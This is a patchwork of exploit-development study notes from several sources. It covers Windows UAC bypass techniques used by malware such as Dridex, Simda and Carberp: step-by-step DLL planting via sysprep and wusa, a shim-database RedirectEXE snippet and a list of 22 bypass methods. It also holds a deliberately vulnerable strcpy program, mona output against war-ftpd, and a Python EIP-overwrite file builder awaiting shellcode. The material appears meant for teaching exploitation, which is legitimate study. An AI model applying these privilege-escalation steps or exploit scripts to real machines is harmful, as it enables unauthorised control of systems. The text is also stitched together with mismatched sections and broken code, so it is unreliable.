Source: OpenSecurityTraining.info
Part 1

​Fuzzing and crash dump analysis
From crash dump to working exploit lab in WinDBG

Here  is  a  very  basic  program  to  help  us  explore  our  exploit  environment.  The  
basic_vuln  program  reads  in  a  binary  file  and  displays  the  first  64  hexadecimal  
bytes  from  that  file.  The  program  prints  various  meta  data  such  as  the  location  of  
variables  and  functions  in  the  process  address  space.  This  meta  information  will  
help  simplify  the  exploitation  process  as  we  are  learning.  

• ISecurityEditor WinNT/Simda method, used to turn off UAC, works from Windows 7 up to Windows 10th1 100136

1. ucmMasqueradedAlterObjectSecurityCOM
* Purpose:
* Change object security through ISecurityEditor(SetNamedInfo).

2. ucmSimdaTurnOffUac
* Purpose:
* Disable UAC using AutoElevated undocumented ISecurityEditor interface.
* Used by WinNT/Simda starting from 2010 year.

• Wusa method used by Win32/Carberp
  

static const char* uacTargetDir[] = { "system32\\sysprep", "ehome" };
static const char* uacTargetApp[] = { "sysprep.exe", "mcx2prov.exe" };
static const char* uacTargetDll[] = { "cryptbase.dll", "CRYPTSP.dll" };
static const char* uacTargetMsu[] = { "cryptbase.msu", "CRYPTSP.msu" };

Steps to reproduce:
1. Make .cab archive with your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe

Source: http://blog.jpcert.or.jp/2015/02/a-new-uac-bypass-method-that-dridex-uses.html
 
This UAC bypass method encompasses manipulating application compatibility databases.
 
Method of Operation:

1. Dridex creates an application compatibility database ($$$.sdb), a batch file ($$$.bat) and a copy of itself (edg3FAC.exe)
2. Dridex uses the sdbinst command to install/uninstall application compatibility databases to install $$$.sdb.
3. Dridex launches the iscsicli command, which is a command line tool for iSCSI initiator. However, the configuration in the installed application compatibility database ($$$.sdb) causes iscsicli.exe to execute $$$.bat with administrative privileges.
4. $$$.bat executes edg3FAC.exe with administrative privileges.

​

• Auto-elevation programs such as sdbinst.exe and iscsicli.exe automatically elevate privileges to administrative privileges when launched without a UAC warning being displayed.
• The sdbinst command, which can change the behavior of other programs, is an auto-elevation program.

1. ucmInitAppHelp
* Purpose:
*Initialize AppHelp routines.

2. ucmRegisterAndRunTarget
* Purpose:
* Register shim database and execute target app.

3. ucmShimRedirectEXE
* Purpose:
* Build, register shim database and execute target app.
* Initially used in BlackEnergy2 and Gootkit by mzH (alive-green).
* Currently used in number of trojans (Win32/Dyre, WinNT/Cridex)

tidShim = SdbBeginWriteListTag(hShimDb, TAG_SHIM_REF);
if (tidShim != TAGID_NULL) {
SdbWriteStringTag(hShimDb, TAG_NAME, L"RedirectEXE");
SdbWriteStringTag(hShimDb, TAG_COMMAND_LINE, lpszPayloadEXE);
SdbEndWriteListTag(hShimDb, tidShim);
}
SdbEndWriteListTag(hShimDb, tidEXE);

4. ucmAppcompatElevation
* Purpose:
* AutoElevation using Application Compatibility engine.

• 1 - Leo Davidson sysprep method, this will work only on Windows 7 and Windows 8, used in multiple malware;
• 2 - Tweaked Leo Davidson sysprep method, this will work only on Windows 8.1.9600;
• 3 - Leo Davidson method tweaked by WinNT/Pitou developers, works from Windows 7 up to 10th2 10532;

​
* Leo Davidson AutoElevation method with derivatives.
*
* UacMethodSysprep1   - Original Leo Davidson concept.
* UacMethodSysprep2   - Windows 8.1 adapted UacMethodSysprep1 (bypassing sysprep embedded manifest dlls redirection).
* UacMethodTilon      - Leo Davidson concept with different target dll, used by Win32/Tilon.
* UacMethodSysprep3   - Windows 10 TH1 adapted UacMethodSysprep1.
* UacMethodOobe       - WinNT/Pitou derivative from Leo Davidson concept

Typical malware UAC bypass:

1. Creates a DLL in %temp%;
2. Inserts code into the running explorer.exe, and explorer.exe moves dll from %temp% to C:\Windows\System32\sysprep\cryptbase.dll;
3. C:\Windows\System32\sysprep\sysprep.exe is executed and sysprep.exe loads ;C:\Windows\System32\sysprep\cryptbase.dll with administrative privileges; and,
4. C:\Windows\System32\sysprep\cryptbase.dll executes malware with administrative privileges

Source: https://github.com/hfiref0x/UACME

The following 22 most popular methods to bypass user account control (UAC):

• 1 - Leo Davidson sysprep method, this will work only on Windows 7 and Windows 8, used in multiple malware;
• 2 - Tweaked Leo Davidson sysprep method, this will work only on Windows 8.1.9600;
• 3 - Leo Davidson method tweaked by WinNT/Pitou developers, works from Windows 7 up to 10th2 10532;
• 4 - Application Compatibility Shim RedirectEXE method, from WinNT/Gootkit. Works from Windows 7 up to 8.1.9600;
• 5 - ISecurityEditor WinNT/Simda method, used to turn off UAC, works from Windows 7 up to Windows 10th1 100136;
• 6 - Wusa method used by Win32/Carberp, tweaked to work with Windows 8/8.1 also;
• 7 - Wusa method, tweaked to work from Windows 7 up to 10th1 10136;
• 8 - Slightly modified Leo Davidson method used by Win32/Tilon, works only on Windows 7;
• 9 - Hybrid method, combination of WinNT/Simda and Win32/Carberp + AVrf, works from Windows 7 up to 10th1 10136;
• 10 - Hybrid method, abusing appinfo.dll way of whitelisting autoelevated applications and KnownDlls cache changes, works from Windows 7 up to 10th2 10532;
• 11 - WinNT/Gootkit second method based on the memory patching from MS "Fix it" patch shim (and as side effect - arbitrary dll injection), works from Windows 7 up to 8.1.9600;
• 12 - Windows 10 sysprep method, abusing different dll dependency added in Windows 10 (works up to 10th2 10558);
• 13 - Hybrid method, abusing Microsoft Management Console and EventViewer missing dependency, works from Windows 7 up to 10rs1 14295;
• 14 - WinNT/Sirefef method, abusing appinfo.dll way of whitelisting OOBE.exe, works from Windows 7 up to 10th2 10558;
• 15 - Win32/Addrop method, also used in Metasploit uacbypass module, works from Windows 7 up to 10rs1 14295;
• 16 - Hybrid method working together with Microsoft GWX backdoor, works from Windows 7 up to 10rs1 14295;
• 17 - Hybrid method, abuses appinfo whitelist/logic/API choice&usage, works from Windows 8.1 (9600) up to 10rs1 14367;
• 18 - Hybrid method, abuses SxS undocumented backdoor used to fix (1) and appinfo whitelist, works from Windows 7 up to 10rs1 14367;
• 19 - Hybrid method, using InetMgr IIS module and based on 10 & 16 MS fixes, works from Windows 7 up to 10rs1 14372;
• 20 - Hybrid method, abusing Microsoft Management Console and incorrect dll loading scheme, works from Windows 7 up to 10rs1 14383;
• 21 - Hybrid method, abusing SxS DotLocal and targeting sysprep, works from Windows 7 up to 10rs1 14383;
• 22 - Hybrid method, abusing SxS DotLocal and targeting consent to gain system privileges, works from Windows 7 up to 10rs1 14383.

Simple Buffer Overflow Vulnerability

• Vulnerable overflow_example.c
• Exploited command 

gcc -o overflow_example overflow_example.c
./overflow_example 1234567890


overflow_example.c:
​​#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
int value = 5;
char buffer_one[8], buffer_two[8];
strcpy(buffer_one, "one"); /* Put "one" into buffer_one. */
strcpy(buffer_two, "two"); /* Put "two" into buffer_two. */
printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);
printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", strlen(argv[1]));
strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two. */
printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

​Source: Cybrary: Advanced Penetration Testing

• Give the program too much input in the username (USER) field
• Saved return pointer will be overwritten with our attack controlled input

Immunity Debugger

• Go to File ->Attach -> war-ftpd

Setup Logging:

• !mona config -set workingfolder C:\logs\%p

Identifying the Overwrite

• !mona pattern_create 1100

=======================================================================
  Output generated by mona.py v2.0, rev 566 - Immunity Debugger
=======================================================================
  OS : xp, release 5.1.2600
  Process being debugged : war-ftpd (pid 4332)
  Current mona arguments: pattern_create 1100
=======================================================================
=======================================================================

Pattern of 1100 bytes :
-----------------------

ASCII:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk

Source: http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html

​Lets begin with the sysprep method which is the most commonly used method of bypassing UAC. Made famous by Leo Davidson in 2009, it involves the following steps:

1. Copy/plant a DLL in the C:\Windows\System32\sysprep directory. The name of the DLL depends on the Windows version.
CRYPTBASE.dll for Windows 7
shcore.dll for Windows 8
2.  Execute sysprep.exe from the above directory. It will load the the above DLL and execute it with elevated privileges. 

In fact, all the UAC bypass methods involve playing with DLL and executable names and locations. See the table below:

http://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html

0. ImmunityDebugger
1. !mona update
2. Attach to the process
2. !mona config -set workingfolder c:\logs\%p

3. !mona pattern_create 2000
4 !mona pattern_offset 37694136  (EIP value -- during the crash)
5. Modify the script

print "Creating exploit."
f=open("crash-me.PLF","w")
#Create the file
push="A"*260 #Found by mona.py
eip ="BBBB" #more 4 bytes to overwrite EIP
junk="C"*1736 #Later will replace this with real shellcode
try:
  f.write(push+eip+junk)
  f.close()
print "File created"
except:
  print "File cannot be created"

Our Next goal will be:
1. Replacing "BBBB" with valid pointer (Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC... after EIP) easy problem.
3. Replacing "CCCCCC..." with real shellcode.

6. !mona jmp -r esp -o